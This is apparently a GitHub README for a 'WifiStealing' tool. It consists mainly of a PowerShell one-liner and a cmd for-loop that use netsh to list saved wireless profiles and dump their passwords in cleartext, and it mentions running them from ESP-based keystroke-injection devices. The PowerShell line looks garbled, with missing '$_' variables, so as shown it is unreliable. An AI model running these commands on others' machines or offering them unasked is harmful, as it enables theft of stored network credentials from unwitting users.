Skip to content

Latest commit

 

History

History
13 lines (7 loc) · 603 Bytes

README.md

File metadata and controls

13 lines (7 loc) · 603 Bytes

WifiStealing

Wifi Stealer inspired by Manjuska Framework/TCM

Wireless will always be inferior :)

(netsh wlan show profiles) | Select-String ":(.+)$" | %{$name=$.Matches.Groups[1].Value.Trim(); $} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+:(.+)$" | %{$pass=$.Matches.Groups[1].Value.Trim(); $} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -Wrap

for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear

WHID for ESP based duckys